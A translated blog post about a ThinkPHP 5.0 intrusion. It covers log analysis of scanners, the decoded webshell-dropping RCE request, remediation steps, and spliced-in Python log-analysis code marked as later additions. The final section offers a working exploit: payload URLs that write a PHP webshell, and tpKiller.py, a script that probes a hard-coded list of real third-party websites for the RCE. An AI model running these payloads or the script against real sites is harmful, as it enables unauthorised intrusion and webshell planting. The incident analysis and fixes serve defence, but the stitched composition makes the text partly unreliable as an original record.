DYBOY's Blog

A record of a ThinkPHP-based website intrusion, from compromise to tracing the attacker

Last night, just as I was about to go to sleep, a friend suddenly messaged me saying his website had been attacked and the homepage content had been tampered with, so I started on emergency repair work.

As soon as I learned of the situation I got back up, had my friend send me the necessary information, and downloaded the site's logs to my machine. Since the site does not get much traffic, I analysed them by hand with Notepad++.

0x01 Download the necessary files

First, download the log files, the source code currently on the web host, and the previous backup of the site to a local machine; this is so they can be compared against each other.

0x02 Log analysis

Since the homepage was defaced, the attacker must have obtained control of the site and uploaded a webshell, so I searched the access log for requests to unusual URLs.

I found the following access-log entries:

203.171.228.159 - - [30/Jan/2019:09:52:46 +0800] "POST //plus/mytag_js.php?aid=9527 HTTP/1.1" 301 178 "http://pay.top15.cn//plus/mytag_js.php?aid=9527" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:46 +0800] "GET /plus/mytag_js.php?aid=9527 HTTP/1.1" 404 564 "http://pay.top15.cn//plus/mytag_js.php?aid=9527" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:46 +0800] "GET /plus/mytag_js.php?aid=9527 HTTP/1.1" 404 564 "http://pay.top15.cn//plus/mytag_js.php?aid=9527" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:48 +0800] "POST //plus/mytag_js.php?aid=9527 HTTP/1.1" 301 178 "http://pay.top15.cn//plus/mytag_js.php?aid=9527" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:48 +0800] "POST //plus/mytag_js.php?aid=9527 HTTP/1.1" 301 178 "http://pay.top15.cn//plus/mytag_js.php?aid=9527" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:48 +0800] "GET /plus/mytag_js.php?aid=9527 HTTP/1.1" 404 564 "http://pay.top15.cn//plus/mytag_js.php?aid=9527" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //data/cache/asd.php HTTP/1.1" 301 178 "http://pay.top15.cn//data/cache/asd.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /data/cache/asd.php HTTP/1.1" 404 564 "http://pay.top15.cn//data/cache/asd.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //plus/result.php HTTP/1.1" 301 178 "http://pay.top15.cn//plus/result.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /plus/result.php HTTP/1.1" 404 564 "http://pay.top15.cn//plus/result.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //plus/read.php HTTP/1.1" 301 178 "http://pay.top15.cn//plus/read.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /plus/read.php HTTP/1.1" 404 564 "http://pay.top15.cn//plus/read.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //data/cache/flye.php HTTP/1.1" 301 178 "http://pay.top15.cn//data/cache/flye.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /data/cache/flye.php HTTP/1.1" 404 564 "http://pay.top15.cn//data/cache/flye.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //plus/moon.php HTTP/1.1" 301 178 "http://pay.top15.cn//plus/moon.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /plus/moon.php HTTP/1.1" 404 564 "http://pay.top15.cn//plus/moon.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //api.php HTTP/1.1" 301 178 "http://pay.top15.cn//api.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /api.php HTTP/1.1" 404 564 "http://pay.top15.cn//api.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //lequ.php HTTP/1.1" 301 178 "http://pay.top15.cn//lequ.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /lequ.php HTTP/1.1" 404 564 "http://pay.top15.cn//lequ.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //lx.php HTTP/1.1" 301 178 "http://pay.top15.cn//lx.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /lx.php HTTP/1.1" 404 564 "http://pay.top15.cn//lx.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //sb.php HTTP/1.1" 301 178 "http://pay.top15.cn//sb.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /sb.php HTTP/1.1" 404 564 "http://pay.top15.cn//sb.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /install/sss1.php HTTP/1.1" 404 564 "http://pay.top15.cn//install/sss1.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"

Looking at these entries, it is obvious that this is a scanner probing the site for webshells that might already be present.

IP lookup:

(Screenshot: IP lookup result, a datacenter address)

So this is a scanner hosted on a server.

Continuing down the log; entries are in increasing chronological order from top to bottom.

Then I found another cluster of entries scanning for website backup files:

117.152.74.243 - - [06/Feb/2019:10:27:06 +0800] "HEAD /index.php?s=hits-show&sid=md5(1)%23&type=md5(1) HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:06 +0800] "HEAD /paytop15cn.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:06 +0800] "HEAD /paytop15cn.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:06 +0800] "HEAD /paytop15cn.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:06 +0800] "HEAD /paytop15cn.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:07 +0800] "HEAD /paytop15cn.sql HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:07 +0800] "HEAD /paytop15cn.sql.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:07 +0800] "HEAD /pay.top15.cn.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:07 +0800] "HEAD /pay.top15.cn.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:07 +0800] "HEAD /pay.top15.cn.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:07 +0800] "HEAD /pay.top15.cn.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:08 +0800] "HEAD /pay.top15.cn.sql HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:08 +0800] "HEAD /pay.top15.cn.sql.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:08 +0800] "HEAD /top15.cn.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:08 +0800] "HEAD /top15.cn.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:08 +0800] "HEAD /top15.cn.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:08 +0800] "HEAD /top15.cn.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.cn.sql HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.cn.sql.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.sql HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.sql.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /wwwtop15.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /wwwtop15.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /wwwtop15.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /wwwtop15.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /wwwtop15.sql HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /wwwtop15.sql.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /public_html.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /public_html.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /public_html.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /public_html.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /www.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /www.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:11 +0800] "HEAD /www.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:11 +0800] "HEAD /www.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"

The IP lookup result is as follows:

(Screenshot: IP information for the second attack record)

Who would have thought that such a small site would draw so many attackers. But these scans are basically all futile: none of those files exist on the site, so they pose no threat. (There are similar scan records in several later places too; not many real users, but plenty of scanners… ⊙﹏⊙b sweat)
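Reading the two clusters above by hand works for a small log. For anything larger, the same reasoning (one client IP, a burst of requests within a few seconds, almost all of them 404s, all aimed at PHP script names or archive names) can be written down as code. The following is an added example, not code from the original post: it parses combined-format access-log lines, groups them by client IP, and reports whether a burst looks like a webshell probe or a backup-file scan. The sample lines are taken from the two log extracts above plus a constructed ordinary visitor (203.0.113.7, a documentation address); the thresholds are assumptions to tune for a real log.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Combined/nginx access-log format: ip ident user [time] "METHOD path proto" status size ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
# Archive and dump extensions a backup-file scanner asks for
BACKUP_EXT = re.compile(r'\.(rar|zip|7z|tar|tar\.gz|tgz|sql|sql\.gz|bak)$', re.I)

# Constructed sample: lines from the two log extracts above, plus one ordinary
# visitor (203.0.113.7) so the contrast with a scanner is visible.
SAMPLE_LOG = r'''
203.171.228.159 - - [30/Jan/2019:09:52:46 +0800] "POST //plus/mytag_js.php?aid=9527 HTTP/1.1" 301 178 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:46 +0800] "GET /plus/mytag_js.php?aid=9527 HTTP/1.1" 404 564 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //data/cache/asd.php HTTP/1.1" 301 178 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /data/cache/asd.php HTTP/1.1" 404 564 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /plus/moon.php HTTP/1.1" 404 564 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /sb.php HTTP/1.1" 404 564 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /install/sss1.php HTTP/1.1" 404 564 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
117.152.74.243 - - [06/Feb/2019:10:27:06 +0800] "HEAD /paytop15cn.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:06 +0800] "HEAD /paytop15cn.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:07 +0800] "HEAD /paytop15cn.sql HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:08 +0800] "HEAD /www.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /public_html.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
203.0.113.7 - - [06/Feb/2019:11:03:15 +0800] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [06/Feb/2019:11:03:16 +0800] "GET /static/style.css HTTP/1.1" 200 800 "-" "Mozilla/5.0"
203.0.113.7 - - [06/Feb/2019:11:04:02 +0800] "GET /missing.png HTTP/1.1" 404 564 "-" "Mozilla/5.0"
'''


def classify_path(path):
    """Bucket a request path by what a scanner would be looking for."""
    path = path.split('?', 1)[0]
    if BACKUP_EXT.search(path):
        return 'backup-archive'
    if path.lower().endswith('.php'):
        return 'php-script'
    return 'other'


def parse_log(log_text):
    """Yield one dict per line that matches the log format; silently skip the rest."""
    for line in log_text.strip().splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        yield {
            'ip': m['ip'],
            'ts': datetime.strptime(m['ts'], '%d/%b/%Y:%H:%M:%S %z'),
            'method': m['method'],
            'path': m['path'],
            'status': int(m['status']),
        }


def analyze(log_text, window_seconds=60, min_requests=5, min_404_ratio=0.6):
    """Per client IP: a burst of mostly-404 requests inside the window is a scanner.
    The verdict names what it was probing for. Thresholds are assumptions to tune."""
    by_ip = defaultdict(list)
    for req in parse_log(log_text):
        by_ip[req['ip']].append(req)
    findings = {}
    for ip, reqs in by_ip.items():
        reqs.sort(key=lambda r: r['ts'])
        span = (reqs[-1]['ts'] - reqs[0]['ts']).total_seconds()
        misses = [r for r in reqs if r['status'] == 404]
        ratio = len(misses) / len(reqs)
        verdict = 'normal'
        if len(reqs) >= min_requests and span <= window_seconds and ratio >= min_404_ratio:
            # The dominant kind of path among the misses says what the scanner wanted
            kinds = Counter(classify_path(r['path']) for r in misses)
            top = kinds.most_common(1)[0][0]
            verdict = {'php-script': 'webshell probe',
                       'backup-archive': 'backup-file scan'}.get(top, 'generic scan')
        findings[ip] = {
            'verdict': verdict,
            'requests': len(reqs),
            'not_found': len(misses),
            'span_seconds': span,
            'probed': sorted({r['path'].split('?', 1)[0] for r in misses}),
        }
    return findings


if __name__ == '__main__':
    for ip, f in analyze(SAMPLE_LOG).items():
        print(ip, f['verdict'], f"{f['not_found']}/{f['requests']} 404s in {f['span_seconds']:.0f}s")
        if f['verdict'] != 'normal':
            print('   probed:', ', '.join(f['probed']))
```

The 301 responses in the first cluster are the server redirecting the double-slash POSTs, which is why the ratio threshold is below 1.0; the paths that actually 404 are what identify the scanner's wordlist.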

The homepage had been replaced with a string of Chinese text, so that should also show up in the access log.

In the /public directory of the downloaded site files I found the following:

(Screenshot: attack files)

index.php and i.php. At a glance the second file is obviously a webshell, so I went to the access log and searched for the keyword i.php:

(Screenshot: log search for i.php)

OK, the attack entries were successfully located.

Clearly, after a few simple visits the attacker went straight to a 0day attack. The system is based on ThinkPHP 5.0, so given the several ThinkPHP RCE vulnerabilities disclosed recently, it is evident the attacker exploited that vulnerability directly.

113.103.115.134 - - [15/Feb/2019:17:26:04 +0800] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=eval(base64_decode(%27JGYgPSBmb3BlbigiaS5waHAiLCAidyIpOw0KJHQgPSAnPD9waHAgJGEgPSBiYXNlNjRfZGVjb2RlKFwnWVhOelpYSjBcJyk7JGEoJF9SRVFVRVNUW1wnaVwnXSk7Pz4nOw0KZndyaXRlKCRmLCR0KTsNCmZjbG9zZSgkZik7%27)) HTTP/1.1" 500 7345 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"

(Screenshot: locating the attacker)

This geolocation is not especially precise, but it is not far off either: the probability of a real person is 92%, so it can be determined that the attacker was most likely using their own home computer.


0x03 Remediation

Since the attack used the latest vulnerability, one that was quite a hot topic a while back (after all, it made programmers work overtime several times).

For an analysis of the vulnerability, I recommend the article “ThinkPHP 5.0 & 5.1 Remote Command Execution Vulnerability Exploitation Analysis” (《ThinkPHP 5.0 & 5.1远程命令执行漏洞利用分析》).

Following that article's analysis, I found from the source code that this program is based on TP5.0, so there are several fixes. The first is to change the default 'var_pathinfo' => 's' in thinkphp/convention.php, replacing s with a complex string.

The second is to upgrade to the latest official version.

The third is to add the following after the code that fetches the controller in the module method of the thinkphp/library/think/App.php class:

if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) {
    throw new HttpException(404, 'controller not exists:' . $controller);
}
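The decoded base64 in the attack line above is what explains the i.php file found in /public, and the controller check in the third fix is exactly the rule that would have rejected that request. The following is an added example, not code from the original post or from ThinkPHP: it takes an access-log line, restores the backslashes that nginx writes as \x5C, applies the same controller regex as the patch to the route carried in the s parameter, and decodes any base64_decode() arguments layer by layer to list the files the payload writes. The attack line is the one from the incident log; the ordinary request (198.51.100.4, route index/article/read) is constructed for contrast, and the field names in the result are my own. One caveat on the first fix: renaming var_pathinfo only changes the name of the query parameter, and the same route can still reach the framework through PATH_INFO, so the controller-name check (or the upgrade) is what actually closes the hole.

```python
import base64
import re
from urllib.parse import parse_qs, unquote, urlsplit

# The controller-name check that fix #3 adds to thinkphp/library/think/App.php,
# transcribed as a Python regex so the same rule can be applied to log lines.
CONTROLLER_RE = re.compile(r'^[A-Za-z](\w|\.)*$')
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')
# Matches base64_decode('...') whether the quotes are plain or backslash-escaped
B64_CALL_RE = re.compile(r"base64_decode\(\s*\\?'?([A-Za-z0-9+/=]+)\\?'?\s*\)")

# Constructed sample: the attack line from the incident log above, plus one
# ordinary request (route and id made up) for contrast.
ATTACK_LINE = (
    r'113.103.115.134 - - [15/Feb/2019:17:26:04 +0800] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction'
    r'&function=call_user_func_array&vars[0]=assert&vars[1][]=eval(base64_decode(%27JGYgPSBmb3BlbigiaS5waHAiLCAidyIpOw0K'
    r'JHQgPSAnPD9waHAgJGEgPSBiYXNlNjRfZGVjb2RlKFwnWVhOelpYSjBcJyk7JGEoJF9SRVFVRVNUW1wnaVwnXSk7Pz4nOw0K'
    r'ZndyaXRlKCRmLCR0KTsNCmZjbG9zZSgkZik7%27)) HTTP/1.1" 500 7345 "-" "Mozilla/5.0"'
)
NORMAL_LINE = r'198.51.100.4 - - [15/Feb/2019:17:30:00 +0800] "GET /index.php?s=/index/article/read&id=3 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"'


def unescape_nginx(s):
    """nginx logs special bytes as \\xHH; turn them back into characters (\\x5C -> backslash)."""
    return re.sub(r'\\x([0-9A-Fa-f]{2})', lambda m: chr(int(m.group(1), 16)), s)


def decode_b64_loose(blob):
    """Decode base64 even when the trailing '=' padding has been stripped."""
    blob += '=' * (-len(blob) % 4)
    return base64.b64decode(blob).decode('utf-8', 'replace')


def peel_base64_layers(text, max_depth=5):
    """Decode every base64_decode('...') argument in text, then in what it decoded to, and so on."""
    layers, queue = [], [text]
    while queue and len(layers) < max_depth:
        current = queue.pop(0)
        for blob in B64_CALL_RE.findall(current):
            try:
                decoded = decode_b64_loose(blob)
            except (ValueError, UnicodeDecodeError):
                continue
            layers.append(decoded)
            queue.append(decoded)
    return layers


def inspect_request(log_line):
    """Would fix #3 reject this request's controller, and what does its payload write?"""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = unescape_nginx(m.group(1))
    query = urlsplit(url).query
    params = parse_qs(query, keep_blank_values=True)
    # TP5 pathinfo route is module/controller/action; tolerate a leading slash
    route = [p for p in params.get('s', [''])[0].split('/') if p]
    controller = route[1] if len(route) > 1 else ''
    layers = peel_base64_layers(unquote(query))
    dropped = []
    for layer in layers:
        dropped += re.findall(r'f(?:open|ile_put_contents)\(\s*["\']([^"\']+)["\']', layer)
    return {
        'rejected_by_fix': not CONTROLLER_RE.match(controller),
        'route': route,
        'controller': controller,
        'function': params.get('function', [''])[0],
        'decoded_layers': layers,
        'dropped_files': dropped,
    }


if __name__ == '__main__':
    for line in (ATTACK_LINE, NORMAL_LINE):
        r = inspect_request(line)
        print('controller %-12r rejected=%s function=%r writes=%s'
              % (r['controller'], r['rejected_by_fix'], r['function'], r['dropped_files']))
        for i, layer in enumerate(r['decoded_layers'], 1):
            print('  layer %d: %s' % (i, layer.strip()))
```

The outer layer decodes to a short PHP dropper that opens i.php for writing, and its inner base64 string decodes to the name of the function the dropped file calls; that chain is the whole reason a one-line i.php sat next to index.php.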

0x04 Writing an EXP:

I wrote a simple exploit.

# -*- coding:utf-8 -*-
# name: tpKiller.py
# author: DYBOY
# description: PoC for the ThinkPHP5 RCE
# time: 2019-02-16

import requests


r"""
5.0.21, 5.0.22:
write a shell: http://example.com/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][1]=<?php @assert($_POST);?>

5.1.*:
write a shell: http://example.com/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php @assert($_POST);?>

"""
# list of sites to check for the vulnerability
target_urls = [
    'http://www.test.com',
    'http://www.meetppt.com',
    'http://www.jiyouche.com',
    'http://www.dfqy.com',
    'http://home.chegouguanjia.com',
    'http://www.aixuetuan.com'
    ]

# payload list. These must be raw strings: in a normal literal '\t' in '\think' becomes a
# tab and '\a' in '\app' a bell character, so the route would never match. The second
# variant (leading slash) is the form seen in the incident log above, where nginx wrote
# the backslash as \x5C.
poc_list = [
    r'/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1',
    r'/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1',
    r'/index.php?s=index/\think\Request/input&filter=phpinfo&data=1',
    ]

def getHtml(url):
    """
    Fetch the page body.
    param: url
    return str (empty string on connection error or timeout)
    """
    try:
        html = requests.get(url, timeout=10)
    except requests.RequestException:
        return ''
    html.encoding = 'utf-8'
    return html.text

def checkBug(url):
    """
    Check whether the RCE vulnerability is present: a successful phpinfo() call
    returns a page containing 'www.php.net'.
    param: url
    return None
    """
    for index, poc in enumerate(poc_list):
        result = getHtml(url + poc)
        if 'www.php.net' in result:
            print("URL: " + url + " is vulnerable to the ThinkPHP5 RCE!\nPOC number: " + str(index + 1))
            break

def attack(urlList):
    """
    Start checking
    param: urls (<type:list>)
    return None
    """
    for url in urlList:
        checkBug(url)

# main program
if __name__ == '__main__':
    attack(target_urls)

0x05 Summary

The ThinkPHP RCE vulnerability was disclosed back in December. At year end many companies are busy with finances, annual meetings and the like, and security checks and maintenance of their websites fall by the wayside, while unbeknownst to them some “hackers” and “black-market teams” on the internet have already begun illegal activity such as harvesting webshells in bulk. So every company and every individual webmaster needs to keep a constant eye on internet security developments and upgrade their security protections in good time.

Copyright notice: “A record of a ThinkPHP-based website intrusion, from compromise to tracing the attacker” is an original article by DYBOY and may not be reproduced without permission.

 DYBOY
 Author's signature: focused on software development and web security; for business cooperation please contact dyboy2017@qq.com
